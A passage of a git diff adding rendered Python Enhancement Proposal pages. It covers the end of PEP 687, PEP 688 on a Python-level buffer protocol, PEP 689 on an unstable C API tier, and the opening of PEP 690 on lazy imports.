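+        check_disallow_instantiation(self, type(iter(b"")))
+
+    def test_not_picklable(self):
+        # Types that should not be serializable must keep raising.
+        with self.assertRaises(TypeError):
+            pickle.dumps(memoryview(b"x"))
+
+if __name__ == "__main__":
+    unittest.main()
+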

+

If another kind of issue is found, the module in question should remain unchanged until a solution is found and added to the Devguide, and already-converted modules are checked and fixed.

+
+
+

Process

+

The following process should be added to the Devguide, and remain until +all modules are converted. +Any new findings should be documented there or in the general HOWTO.

+
+

Part 1: Preparation

+
    +
  1. Open a discussion, either on the bug tracker or on Discourse. Involve the module maintainer and/or code owner. Explain the reason and rationale for the changes.
  2. Identify global state performance bottlenecks. Create a proof-of-concept implementation, and measure the performance impact. pyperf is a good tool for benchmarking.
  3. Create an implementation plan. For small modules with few types, a single PR may do the job. For larger modules with lots of types, and possibly also external library callbacks, multiple PRs will be needed.
+
+
+

Part 2: Implementation

+

Note: this is a suggested implementation plan for a complex module, based on +lessons learned with other modules. Feel free to simplify it for +smaller modules.

+
    +
  1. Add Argument Clinic where possible; it enables you to easily use the defining class to fetch module state from type methods.
  2. Prepare for module state: establish a module state struct, add an instance as a static global variable, and create helper stubs for fetching the module state.
  3. Add relevant global variables to the module state struct, and modify code that accesses the global state to use the module state helpers instead. This step may be broken into several PRs.
  4. Where necessary, convert static types to heap types.
  5. Convert the global module state struct to true module state.
  6. Implement multi-phase initialization.
+

Steps 4 through 6 should preferably land in a single alpha development phase.

+
+
+
+
+

Backwards Compatibility

+

Extension modules in the standard library will now be loadable more than once. +For example, deleting such a module from sys.modules and re-importing it +will result in a fresh module instance, isolated from any previously loaded +instances.

+

This may affect code that expected the previous behavior: globals of +extension modules were shallowly copied from the first loaded module.

+
+
+

Security Implications

+

None known.

+
+
+

How to Teach This

+

A large part of this proposal is a HOWTO aimed at experienced users, +which will be moved to the documentation.

+

Beginners should not be affected.

+
+
+

Reference Implementation

+

Most of the changes are now in the main branch, as commits for these issues:

+ +

As an example, changes and fix-ups done in the _csv module are:

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0687.rst

+

Last modified: 2023-10-04 23:18:07 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0688/index.html b/pep-0688/index.html new file mode 100644 index 00000000000..9a5cf94ae3b --- /dev/null +++ b/pep-0688/index.html @@ -0,0 +1,574 @@ + PEP 688 – Making the buffer protocol accessible in Python | peps.python.org +
+
+


+ + +
+
+
+

PEP 688 – Making the buffer protocol accessible in Python

+
+
Author:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
23-Apr-2022
+
Python-Version:
+
3.12
+
Post-History:
+
23-Apr-2022, +25-Apr-2022, +06-Oct-2022, +26-Oct-2022
+
Resolution:
+
07-Mar-2023
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Emulating buffer types.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes a Python-level API for the buffer protocol, +which is currently accessible only to C code. This allows type +checkers to evaluate whether objects implement the protocol.

+
+
+

Motivation

+

The CPython C API provides a versatile mechanism for accessing the +underlying memory of an object—the buffer protocol +introduced in PEP 3118. +Functions that accept binary data are usually written to handle any +object implementing the buffer protocol. For example, at the time of writing, +there are around 130 functions in CPython using the Argument Clinic +Py_buffer type, which accepts the buffer protocol.

+

Currently, there is no way for Python code to inspect whether an object +supports the buffer protocol. Moreover, the static type system +does not provide a type annotation to represent the protocol. +This is a common problem +when writing type annotations for code that accepts generic buffers.

+

Similarly, it is impossible for a class written in Python to support +the buffer protocol. A buffer class in +Python would give users the ability to easily wrap a C buffer object, or to test +the behavior of an API that consumes the buffer protocol. Granted, this is not +a particularly common need. However, there has been a +CPython feature request +for supporting buffer classes written in Python that has been open since 2012.

+
+
+

Rationale

+
+

Current options

+

There are two known workarounds for annotating buffer types in +the type system, but neither is adequate.

+

First, the current workaround +for buffer types in typeshed is a type alias +that lists well-known buffer types in the standard library, such as +bytes, bytearray, memoryview, and array.array. This +approach works for the standard library, but it does not extend to +third-party buffer types.

+

Second, the documentation +for typing.ByteString currently states:

+
+
This type represents the types bytes, bytearray, and +memoryview of byte sequences.

As a shorthand for this type, bytes can be used to annotate +arguments of any of the types mentioned above.

+
+

Although this sentence has been in the documentation +since 2015, +the use of bytes to include these other types is not specified +in any of the typing PEPs. Furthermore, this mechanism has a number of +problems. It does not include all possible buffer types, and it +makes the bytes type ambiguous in type annotations. After all, +there are many operations that are valid on bytes objects, but +not on memoryview objects, and it is perfectly possible for +a function to accept bytes but not memoryview objects. +A mypy user +reports +that this shortcut has caused significant problems for the psycopg project.

+
+
+

Kinds of buffers

+

The C buffer protocol supports +many options, +affecting strides, contiguity, and support for writing to the buffer. Some of these +options would be useful in the type system. For example, typeshed +currently provides separate type aliases for writable and read-only +buffers.

+

However, in the C buffer protocol, most of these options cannot be +queried directly on the type object. The only way to figure out +whether an object supports a particular flag is to actually +ask for the buffer. For some types, such as memoryview, +the supported flags depend on the instance. As a result, it would +be difficult to represent support for these flags in the type system.

+
+
+
+

Specification

+
+

Python-level buffer protocol

+

We propose to add two Python-level special methods, __buffer__ +and __release_buffer__. Python +classes that implement these methods are usable as buffers from C +code. Conversely, classes implemented in C that support the +buffer protocol acquire synthesized methods accessible from Python +code.

+

The __buffer__ method is called to create a buffer from a Python +object, for example by the memoryview() constructor. +It corresponds to the bf_getbuffer C slot. +The Python signature for this method is +def __buffer__(self, flags: int, /) -> memoryview: .... The method +must return a memoryview object. If the bf_getbuffer slot +is invoked on a Python class with a __buffer__ method, +the interpreter extracts the underlying Py_buffer from the +memoryview returned by the method +and returns it to the C caller. Similarly, if Python code calls the +__buffer__ method on an instance of a C class that +implements bf_getbuffer, the returned buffer is wrapped in a +memoryview for consumption by Python code.

+

The __release_buffer__ method should be called when a caller no +longer needs the buffer returned by __buffer__. It corresponds to the +bf_releasebuffer C slot. This is an +optional part of the buffer protocol. +The Python signature for this method is +def __release_buffer__(self, buffer: memoryview, /) -> None: .... +The buffer to be released is wrapped in a memoryview. When this +method is invoked through CPython’s buffer API (for example, through +calling memoryview.release on a memoryview returned by +__buffer__), the passed memoryview is the same object +as was returned by __buffer__. It is +also possible to call __release_buffer__ on a C class that +implements bf_releasebuffer.

+

If __release_buffer__ exists on an object, +Python code that calls __buffer__ directly on the object must +call __release_buffer__ on the same object when it is done +with the buffer. Otherwise, resources used by the object may +not be reclaimed. Similarly, it is a programming error +to call __release_buffer__ without a previous call to +__buffer__, or to call it multiple times for a single call +to __buffer__. For objects that implement the C buffer protocol, +calls to __release_buffer__ where the argument is not a +memoryview wrapping the same object will raise an exception. +After a valid call to __release_buffer__, the memoryview +is invalidated (as if its release() method had been called), +and any subsequent calls to __release_buffer__ with the same +memoryview will raise an exception. +The interpreter will ensure that misuse +of the Python API will not break invariants at the C level – for +example, it will not cause memory safety violations.

+
+
+

inspect.BufferFlags

+

To help implementations of __buffer__, we add inspect.BufferFlags, +a subclass of enum.IntFlag. This enum contains all flags defined in the +C buffer protocol. For example, inspect.BufferFlags.SIMPLE has the same +value as the PyBUF_SIMPLE constant.
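
An illustrative session (the flag values mirror the C PyBUF_* constants; exact values and reprs are a detail of the implementation):

+
>>> import inspect
+>>> int(inspect.BufferFlags.SIMPLE)  # same value as PyBUF_SIMPLE
+0
+>>> bool(inspect.BufferFlags.FULL_RO & inspect.BufferFlags.WRITABLE)
+False
+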

+
+
+

collections.abc.Buffer

+

We add a new abstract base class, collections.abc.Buffer, which requires the __buffer__ method. This class is intended primarily for use in type annotations:

+
def need_buffer(b: Buffer) -> memoryview:
+    return memoryview(b)
+
+need_buffer(b"xy")  # ok
+need_buffer("xy")  # rejected by static type checkers
+
+
+

It can also be used in isinstance and issubclass checks:

+
>>> from collections.abc import Buffer
+>>> isinstance(b"xy", Buffer)
+True
+>>> issubclass(bytes, Buffer)
+True
+>>> issubclass(memoryview, Buffer)
+True
+>>> isinstance("xy", Buffer)
+False
+>>> issubclass(str, Buffer)
+False
+
+
+

In the typeshed stub files, the class should be defined as a Protocol, +following the precedent of other simple ABCs in collections.abc such as +collections.abc.Iterable or collections.abc.Sized.

+
+
+

Example

+

The following is an example of a Python class that implements the +buffer protocol:

+
import contextlib
+import inspect
+
+class MyBuffer:
+    def __init__(self, data: bytes):
+        self.data = bytearray(data)
+        self.view = None
+
+    def __buffer__(self, flags: int) -> memoryview:
+        if flags != inspect.BufferFlags.FULL_RO:
+            raise TypeError("Only BufferFlags.FULL_RO supported")
+        if self.view is not None:
+            raise RuntimeError("Buffer already held")
+        self.view = memoryview(self.data)
+        return self.view
+
+    def __release_buffer__(self, view: memoryview) -> None:
+        assert self.view is view  # guaranteed to be true
+        self.view.release()
+        self.view = None
+
+    def extend(self, b: bytes) -> None:
+        if self.view is not None:
+            raise RuntimeError("Cannot extend held buffer")
+        self.data.extend(b)
+
+buffer = MyBuffer(b"capybara")
+with memoryview(buffer) as view:
+    view[0] = ord("C")
+
+    with contextlib.suppress(RuntimeError):
+        buffer.extend(b"!")  # raises RuntimeError
+
+buffer.extend(b"!")  # ok, buffer is no longer held
+
+with memoryview(buffer) as view:
+    assert view.tobytes() == b"Capybara!"
+
+
+
+
+

Equivalent for older Python versions

+

New typing features are usually backported to older Python versions +in the typing_extensions +package. Because the buffer protocol +is currently accessible only in C, this PEP cannot be fully implemented +in a pure-Python package like typing_extensions. As a temporary +workaround, an abstract base class typing_extensions.Buffer +will be provided for Python versions +that do not have collections.abc.Buffer available.

+

After this PEP is implemented, inheriting from collections.abc.Buffer will +not be necessary to indicate that an object supports the buffer protocol. +However, in older Python versions, it will be necessary to explicitly +inherit from typing_extensions.Buffer to indicate to type checkers that +a class supports the buffer protocol, since objects supporting the buffer +protocol will not have a __buffer__ method. It is expected that this +will happen primarily in stub files, because buffer classes are necessarily +implemented in C code, which cannot have types defined inline. +For runtime uses, the ABC.register API can be used to register +buffer classes with typing_extensions.Buffer.
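
A sketch of the runtime-registration approach on older Pythons (ThirdPartyBuffer is a hypothetical stand-in for a buffer class implemented in C):

+
from typing_extensions import Buffer
+
+class ThirdPartyBuffer:  # hypothetical C-implemented buffer type
+    ...
+
+# Makes isinstance(obj, Buffer) work on Python versions where the
+# class has no __buffer__ method visible from Python.
+Buffer.register(ThirdPartyBuffer)
+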

+
+
+

No special meaning for bytes

+

The special case stating that bytes may be used as a shorthand +for other ByteString types will be removed from the typing +documentation. +With collections.abc.Buffer available as an alternative, there will be no good +reason to allow bytes as a shorthand. +Type checkers currently implementing this behavior +should deprecate and eventually remove it.

+
+
+
+

Backwards Compatibility

+
+

__buffer__ and __release_buffer__ attributes

+

As the runtime changes in this PEP only add new functionality, there are +few backwards compatibility concerns.

+

However, code that uses a __buffer__ or __release_buffer__ attribute for +other purposes may be affected. While all dunders are technically reserved for the +language, it is still good practice to ensure that a new dunder does not +interfere with too much existing code, especially widely used packages. A survey +of publicly accessible code found:

+
    +
  • PyPy supports +a __buffer__ method with compatible semantics to those proposed in this +PEP. A PyPy core developer expressed his support +for this PEP.
  • +
  • pyzmq implements +a PyPy-compatible __buffer__ method.
  • +
  • mpi4py defines +a SupportsBuffer protocol that would be equivalent to this PEP’s collections.abc.Buffer.
  • +
  • NumPy used to have an undocumented behavior where it would access a __buffer__ attribute +(not method) to get an object’s buffer. This was removed +in 2019 for NumPy 1.17. The behavior would have last worked in NumPy 1.16, which only supported +Python 3.7 and older. Python 3.7 will have reached its end of life by the time this PEP is expected to +be implemented.
  • +
+

Thus, this PEP’s use of the __buffer__ method will improve interoperability with +PyPy and not interfere with the current versions of any major Python packages.

+

No publicly accessible code uses the name __release_buffer__.

+
+
+

Removal of the bytes special case

+

Separately, the recommendation to remove the special behavior for +bytes in type checkers does have a backwards compatibility +impact on their users. An experiment +with mypy shows that several major open source projects that use it +for type checking will see new errors if the bytes promotion +is removed. Many of these errors can be fixed by improving +the stubs in typeshed, as has already been done for the +builtins, +binascii, +pickle, and +re modules. +A review of all +usage of bytes types in typeshed is in progress. +Overall, the change improves type safety and makes the type system +more consistent, so we believe the migration cost is worth it.

+
+
+
+

How to Teach This

+

We will add notes pointing to collections.abc.Buffer in appropriate places in the +documentation, such as typing.readthedocs.io +and the mypy cheat sheet. +Type checkers may provide additional pointers in their error messages. For example, +when they encounter a buffer object being passed to a function that +is annotated to only accept bytes, the error message could include a note suggesting +the use of collections.abc.Buffer instead.

+
+
+

Reference Implementation

+

An implementation of this PEP is +available +in the author’s fork.

+
+
+

Rejected Ideas

+
+

types.Buffer

+

An earlier version of this PEP proposed adding a new types.Buffer type with +an __instancecheck__ implemented in C so that isinstance() checks can be +used to check whether a type implements the buffer protocol. This avoids the +complexity of exposing the full buffer protocol to Python code, while still +allowing the type system to check for the buffer protocol.

+

However, that approach +does not compose well with the rest of the type system, because types.Buffer +would be a nominal type, not a structural one. For example, there would be no way +to represent “an object that supports both the buffer protocol and __len__”. With +the current proposal, __buffer__ is like any other special method, so a +Protocol can be defined combining it with another method.
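
For example, a sketch of such a combined protocol (SizedBuffer is a name invented here for illustration, not part of this PEP):

+
from typing import Protocol
+
+class SizedBuffer(Protocol):
+    """Supports both the buffer protocol and len()."""
+    def __buffer__(self, flags: int, /) -> memoryview: ...
+    def __len__(self) -> int: ...
+
+def first_byte(data: SizedBuffer) -> int:
+    # bytes, bytearray and memoryview all satisfy this protocol.
+    return memoryview(data)[0] if len(data) else -1
+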

+

More generally, no other part of Python works like the proposed types.Buffer. +The current proposal is more consistent with the rest of the language, where +C-level slots usually have corresponding Python-level special methods.

+
+
+

Keep bytearray compatible with bytes

+

It has been suggested to remove the special case where memoryview is +always compatible with bytes, but keep it for bytearray, because +the two types have very similar interfaces. However, several standard +library functions (e.g., re.compile, socket.getaddrinfo, and most +functions accepting path-like arguments) accept +bytes but not bytearray. In most codebases, bytearray is also +not a very common type. We prefer to have users spell out accepted types +explicitly (or use Protocol from PEP 544 if only a specific set of +methods is required). This aspect of the proposal was specifically +discussed +on the typing-sig mailing list, without any strong disagreement from the +typing community.

+
+
+

Distinguish between mutable and immutable buffers

+

The most frequently used distinction within buffer types is +whether or not the buffer is mutable. Some functions accept only +mutable buffers (e.g., bytearray, some memoryview objects), +others accept all buffers.

+

An earlier version of this PEP proposed using the presence of the +bf_releasebuffer slot to determine whether a buffer type is mutable. +This rule holds for most standard library buffer types, but the relationship +between mutability and the presence of this slot is not absolute. For +example, numpy arrays are mutable but do not have this slot.

+

The current buffer protocol does not provide any way to reliably +determine whether a buffer type represents a mutable or immutable +buffer. Therefore, this PEP does not add type system support +for this distinction. +The question can be revisited in the future if the buffer protocol +is enhanced to provide static introspection support. +A sketch +for such a mechanism exists.

+
+
+
+

Acknowledgments

+

Many people have provided useful feedback on drafts of this PEP. +Petr Viktorin has been particularly helpful in improving my understanding +of the subtleties of the buffer protocol.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0688.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0689/index.html b/pep-0689/index.html new file mode 100644 index 00000000000..261dc42f05f --- /dev/null +++ b/pep-0689/index.html @@ -0,0 +1,402 @@ + PEP 689 – Unstable C API tier | peps.python.org +
+
+


+ + +
+
+
+

PEP 689 – Unstable C API tier

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
523
+
Created:
+
22-Apr-2022
+
Python-Version:
+
3.12
+
Post-History:
+
27-Apr-2022, +25-Aug-2022, +27-Oct-2022
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Changing Python’s C API.

+


+

User-facing documentation is at Unstable C API.

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Some functions and types of the C-API are designated unstable, +meaning that they will not change in patch (bugfix/security) releases, +but may change between minor releases (e.g. between 3.11 and 3.12) without +deprecation warnings.

+

Any C API with a leading underscore is designated internal, meaning that it +may change or disappear without any notice.

+
+
+

Motivation & Rationale

+
+

Unstable C API tier

+

The Python C-API is currently divided into three stability tiers:

+
    +
  • Limited API, with high compatibility expectations
  • +
  • Public API, which follows the backwards compatibility policy, and requires deprecation warnings before changes
  • +
  • Internal (private) API, which can change at any time.
  • +
+

Tools requiring access to CPython internals (e.g. advanced +debuggers and JIT compilers) are often built for minor series releases +of CPython, and assume that the C-API internals used do not change +in patch releases. To support these tools, we need a tier between the +Public and Private C-API, with guarantees on stability throughout +the minor-series release: the proposed Unstable tier.

+

Some functions, like PyCode_New(), are documented as unstable +(“Calling [it] directly can bind you to a precise Python version”), +and also often change in practice. +The unstable tier should make their status obvious even to people who don’t +read the docs carefully enough, making them hard to use accidentally.

+
+
+

Reserving leading underscores for Private API

+

Currently, CPython developers don’t agree on the exact meaning of a leading +underscore in API names. +It is used to mean two different things:

+
    +
  • API that may change between minor releases, as in the Unstable tier proposed +here (e.g. functions introduced in PEP 523).
  • +
  • API that is private and should not be used outside of CPython at all +(e.g. because it may change without notice, or it relies on undocumented +assumptions that non-CPython code cannot guarantee).
  • +
+

The unclear meaning makes the underscore less useful than it could be. +If it only marked private API, CPython developers could change underscored +functions, or remove unused ones, without researching how they’re +documented or used outside CPython.

+

With the introduction of a dedicated unstable tier, we can clarify the meaning +of the leading underscore. It should mark private API only.

+
+
+

Not breaking code unnecessarily

+

This PEP specifies that API in the unstable tier should have a special name +prefix. This means functions (macros, etc.) will need to be renamed. +After a rename, the old name should continue to be available until +an incompatible change is made (i.e. until call sites need to be updated +anyway). +In other words, just changing the tier of a function shouldn’t break users’ +code.

+
+
+
+

Specification

+

The C API is divided by stability expectations into three “sections” +(internal, public, and limited). +We’ll now call these stability tiers, or tiers for short.

+

An Unstable tier will be added.

+

APIs (functions, types, etc.) in this tier will be named with the PyUnstable_ prefix, with no leading underscore.

+

They will be declared in headers used for public API (Include/*.h, +rather than in a subdirectory like Include/unstable/).

+

Several rules for dealing with the unstable tier will be introduced:

+
    +
  • Unstable API should have no backwards-incompatible +changes across patch releases, but may change or be removed in minor +releases (3.x.0, including Alpha and Beta releases of 3.x.0). +Such changes must be documented and mentioned in the What’s New document.
  • +
  • Backwards-incompatible changes to these APIs should be made so that +code that uses them will need to be updated to compile with +the new version (e.g. arguments should be added/removed, or a function should +be renamed, but the semantic meaning of an argument should not change).
  • +
  • Unstable API should be documented and tested.
  • +
  • To move an API from the public tier to the unstable tier, it should be +exposed under the new PyUnstable_* name.

The old name should be deprecated (e.g. with Py_DEPRECATED), but continue to be available until an incompatible change is made to the API. Per Python’s backwards compatibility policy (PEP 387), this deprecation needs to last at least two releases (without an SC exception). But it can also last indefinitely – for example, if PEP 590’s “provisional” _PyObject_Vectorcall was added today, it would be initially named PyUnstable_Object_Vectorcall and there would be no plan to remove this name.

    +

    In the following cases, an incompatible change (and thus removing the +deprecated name) is allowed without an SC exception, as if the function was +already part of the Unstable tier:

    +
      +
    • Any API introduced before Python 3.12 that is documented to be less +stable than default.
    • +
    • Any API introduced before Python 3.12 that was named with a leading +underscore.
    • +
    +

    For examples, see the initial unstable API +specified in this PEP.

    +
  • +
  • To move an internal API to the unstable tier, it should be +exposed under the new PyUnstable_* name.

    If the old name is documented, or widely used externally, +it should continue to be available until an +incompatible change is made (and call sites need to be updated). +It should start raising deprecation warnings (e.g. using Py_DEPRECATED).

    +
  • +
  • To move an API from the unstable tier to the public tier, it should be +exposed without the PyUnstable_* prefix.

    The old name should remain available until the API is deprecated or removed.

    +
  • +
  • Adding new unstable API for existing features is allowed even after Beta feature freeze, up until the first Release Candidate. Consensus on the Core Development Discourse is needed in the Beta period.
  • +
+

These rules will be documented in the devguide, +and user documentation +will be updated accordingly.

+

Reference docs for C API named PyUnstable_* will automatically show +notes with links to the unstable tier documentation.

+
+

Leading underscore

+

C API named with a leading underscore, as well as API only available with +Py_BUILD_CORE, will be considered internal. +This means:

+
    +
  • It may change or be removed without notice in minor +releases (3.x.0, including Alpha and Beta releases of 3.x.0). +API changes in patch releases or Release Candidates should only be done if +absolutely necessary.
  • +
  • It should be documented in source comments or Devguide only, not in the +public documentation.
  • +
  • API introduced before Python 3.12 that is documented or widely used +externally should be moved to the Unstable tier as explained above.

    This might happen long after this PEP is accepted. +Consequently, for a few years core devs should do some research before +changing underscored API, especially if it doesn’t need Py_BUILD_CORE.

    +
  • +
+

Users of the C API are encouraged to search their codebase for _Py and +_PY identifier prefixes, and treat any hits as issues to be eventually +fixed – either by switching to an existing alternative, or by opening +a CPython issue to request exposing public API for their use case, +and eventually switching to that.

+
+
+

Initial unstable API

+

The following API will be moved to the Unstable tier in the initial +implementation as proof of the concept.

+

Code object constructors:

+
    +
  • PyUnstable_Code_New() (renamed from PyCode_New)
  • +
  • PyUnstable_Code_NewWithPosOnlyArgs() (renamed from PyCode_NewWithPosOnlyArgs)
  • +
+

Code extra information (PEP 523):

+
    +
  • PyUnstable_Eval_RequestCodeExtraIndex() (renamed from _PyEval_RequestCodeExtraIndex)
  • +
  • PyUnstable_Code_GetExtra() (renamed from _PyCode_GetExtra)
  • +
  • PyUnstable_Code_SetExtra() (renamed from _PyCode_SetExtra)
  • +
+

More are expected in Python 3.12, without the need for another PEP.

+
+
+
+

Backwards Compatibility

+

The C API backwards compatibility expectations will be made clearer.

+

All renamed API will be available under old names for as long as feasible.

+
+
+

How to Teach This

+

The changes affect advanced C programmers, who should consult the +updated reference documentation, devguide and/or What’s New document.

+
+
+

Reference Implementation

+

https://github.com/python/cpython/compare/main...encukou:unstable-tier

+
+
+

Rejected Ideas

+
+

No special prefix

+

In the initial version of this PEP, unstable API didn’t have the PyUnstable +prefix. +Instead, defining Py_USING_UNSTABLE_API made the API available in a given +source file, signifying acknowledgement that the file as a whole will +potentially need to be revisited for each Python release.

+

However, it was decided that unstable-ness needs to be exposed +in the individual names.

+
+
+

Underscore prefix

+

It would be possible to mark both private and unstable API with +leading underscores. +However, that would dilute the meaning of _Py prefix. +Reserving the prefix for internal API only makes it trivial to search for.

+
+
+

New header directory

+

Other API tiers have dedicated directories for headers +(Include/cpython/, Include/internal/).

+

Since the unstable tier uses a very obvious naming convention +and the names are always available, +a directory like Include/unstable/ is unnecessary.

+
+
+

Python API

+

It might be good to add a similar tier in the Python (not C) API, +e.g. for types.CodeType. +However, the mechanism for that would need to be different. +This is outside the scope of the PEP.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0689.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0690/index.html b/pep-0690/index.html new file mode 100644 index 00000000000..c67824f2a92 --- /dev/null +++ b/pep-0690/index.html @@ -0,0 +1,937 @@ + PEP 690 – Lazy Imports | peps.python.org +
+
+


+ + +
+
+
+

PEP 690 – Lazy Imports

+
+
Author:
+
Germán Méndez Bravo <german.mb at gmail.com>, Carl Meyer <carl at oddbird.net>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Apr-2022
+
Python-Version:
+
3.12
+
Post-History:
+
03-May-2022, +03-May-2022
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Abstract

+

This PEP proposes a feature to transparently defer the finding and execution of +imported modules until the moment when an imported object is first used. Since +Python programs commonly import many more modules than a single invocation of +the program is likely to use in practice, lazy imports can greatly reduce the +overall number of modules loaded, improving startup time and memory usage. Lazy +imports also mostly eliminate the risk of import cycles.

+
+
+

Motivation

+

Common Python code style prefers imports at module +level, so they don’t have to be repeated within each scope the imported object +is used in, and to avoid the inefficiency of repeated execution of the import +system at runtime. This means that importing the main module of a program +typically results in an immediate cascade of imports of most or all of the +modules that may ever be needed by the program.

+

Consider the example of a Python command line program (CLI) with a number of +subcommands. Each subcommand may perform different tasks, requiring the import +of different dependencies. But a given invocation of the program will only +execute a single subcommand, or possibly none (i.e. if just --help usage +info is requested). Top-level eager imports in such a program will result in the +import of many modules that will never be used at all; the time spent (possibly +compiling and) executing these modules is pure waste.

+

To improve startup time, some large Python CLIs make imports lazy by manually +placing imports inline into functions to delay imports of expensive subsystems. +This manual approach is labor-intensive and fragile; one misplaced import or +refactor can easily undo painstaking optimization work.

+

The Python standard library already includes built-in support for lazy imports, +via importlib.util.LazyLoader. +There are also third-party packages such as demandimport. These provide a “lazy module +object” which delays its own import until first attribute access. This is not +sufficient to make all imports lazy: imports such as from foo import a, b +will still eagerly import the module foo since they immediately access an +attribute from it. It also imposes noticeable runtime overhead on every module +attribute access, since it requires a Python-level __getattr__ or +__getattribute__ implementation.

+

Authors of scientific Python packages have also made extensive use of lazy +imports to allow users to write e.g. import scipy as sp and then easily +access many different submodules with e.g. sp.linalg, without requiring all +the many submodules to be imported up-front. SPEC 1 codifies this practice in the +form of a lazy_loader library that can be used explicitly in a package +__init__.py to provide lazily accessible submodules.

+

Users of static typing also have to import names for use in type annotations +that may never be used at runtime (if PEP 563 or possibly in future +PEP 649 are used to avoid eager runtime evaluation of annotations). Lazy +imports are very attractive in this scenario to avoid overhead of unneeded +imports.

+

This PEP proposes a more general and comprehensive solution for lazy imports +that can encompass all of the above use cases and does not impose detectable +overhead in real-world use. The implementation in this PEP has already +demonstrated +startup time improvements up to 70% and memory-use reductions up to 40% on +real-world Python CLIs.

+

Lazy imports also eliminate most import cycles. With eager imports, “false +cycles” can easily occur which are fixed by simply moving an import to the +bottom of a module or inline into a function, or switching from from foo +import bar to import foo. With lazy imports, these “cycles” just work. +The only cycles which will remain are those where two modules actually each use +a name from the other at module level; these “true” cycles are only fixable by +refactoring the classes or functions involved.

+
+
+

Rationale

+

The aim of this feature is to make imports transparently lazy. “Lazy” means +that the import of a module (execution of the module body and addition of the +module object to sys.modules) should not occur until the module (or a name +imported from it) is actually referenced during execution. “Transparent” means +that besides the delayed import (and necessarily observable effects of that, +such as delayed import side effects and changes to sys.modules), there is +no other observable change in behavior: the imported object is present in the +module namespace as normal and is transparently loaded whenever first used: its +status as a “lazy imported object” is not directly observable from Python or +from C extension code.

+

The requirement that the imported object be present in the module namespace as +usual, even before the import has actually occurred, means that we need some +kind of “lazy object” placeholder to represent the not-yet-imported object. +The transparency requirement dictates that this placeholder must never be +visible to Python code; any reference to it must trigger the import and replace +it with the real imported object.

+

Given the possibility that Python (or C extension) code may pull objects +directly out of a module __dict__, the only way to reliably prevent +accidental leakage of lazy objects is to have the dictionary itself be +responsible to ensure resolution of lazy objects on lookup.

+

When a lookup finds that the key references a lazy object, it resolves the lazy +object immediately before returning it. To avoid side effects mutating +dictionaries midway through iteration, all lazy objects in a dictionary are +resolved prior to starting an iteration; this could incur a performance penalty +when using bulk iterations (iter(dict), reversed(dict), +dict.__reversed__(), dict.keys(), iter(dict.keys()) and +reversed(dict.keys())). To avoid this performance penalty on the vast +majority of dictionaries, which never contain any lazy objects, we steal a bit +from the dk_kind field for a new dk_lazy_imports flag to keep track of +whether a dictionary may contain lazy objects or not.

+

This implementation comprehensively prevents leakage of lazy objects, ensuring +they are always resolved to the real imported object before anyone can get hold +of them for any use, while avoiding any significant performance impact on +dictionaries in general.

+
+
+

Specification

+

Lazy imports are opt-in, and they can be globally enabled either via a new +-L flag to the Python interpreter, or via a call to a new +importlib.set_lazy_imports() function. This function takes two arguments, a +boolean enabled and an excluding container. If enabled is true, lazy +imports will be turned on from that point forward. If it is false, they will be +turned off from that point forward. (Use of the excluding keyword is +discussed below under “Per-module opt-out.”)

+

When the flag -L is passed to the Python interpreter, a new +sys.flags.lazy_imports is set to True, otherwise it exists as False. +This flag is used to propagate -L to new Python subprocesses.

+

The flag in sys.flags.lazy_imports does not necessarily reflect the current +status of lazy imports, only whether the interpreter was started with the -L +option. Actual current status of whether lazy imports are enabled or not at any +moment can be retrieved using importlib.is_lazy_imports_enabled(), which +will return True if lazy imports are enabled at the call point or False +otherwise.
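
A sketch of the proposed programmatic API (these importlib functions were only proposed by this PEP, which was ultimately rejected, so they do not exist in any released CPython):

+
import importlib
+
+importlib.set_lazy_imports(True)           # enable lazy imports from here on
+assert importlib.is_lazy_imports_enabled()
+
+importlib.set_lazy_imports(False)          # turn them back off
+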

+

When lazy imports are enabled, the loading and execution of all (and only) +top-level imports is deferred until the imported name is first used. This could +happen immediately (e.g. on the very next line after the import statement) or +much later (e.g. while using the name inside a function being called by some +other code at some later time.)

+

For these top level imports, there are two contexts which will make them eager +(not lazy): imports inside try / except / finally or with +blocks, and star imports (from foo import *.) Imports inside +exception-handling blocks (this includes with blocks, since those can also +“catch” and handle exceptions) remain eager so that any exceptions arising from +the import can be handled. Star imports must remain eager since performing the +import is the only way to know which names should be added to the namespace.

+

Imports inside class definitions or inside functions/methods are not “top +level” and are never lazy.

+

Dynamic imports using __import__() or importlib.import_module() are +also never lazy.
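
Putting the eagerness rules together in one sketch (_fastpath is a hypothetical module name):

+
import json                   # top-level: lazy under -L
+
+try:
+    import _fastpath          # eager: inside try/except, so ImportError is catchable
+except ImportError:
+    _fastpath = None
+
+from os.path import *         # eager: a star import must execute to know the names
+
+def handler():
+    import csv                # not top-level: never lazy
+    ...
+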

+

Lazy imports state (i.e. whether they have been enabled, and any excluded +modules; see below) is per-interpreter, but global within the interpreter (i.e. +all threads will be affected).

+
+

Example

+

Say we have a module spam.py:

+
# simulate some work
+import time
+time.sleep(10)
+print("spam loaded")
+
+
+

And a module eggs.py which imports it:

+
import spam
+print("imports done")
+
+
+

If we run python -L eggs.py, the spam module will never be imported +(because it is never referenced after the import), "spam loaded" will never +be printed, and there will be no 10 second delay.

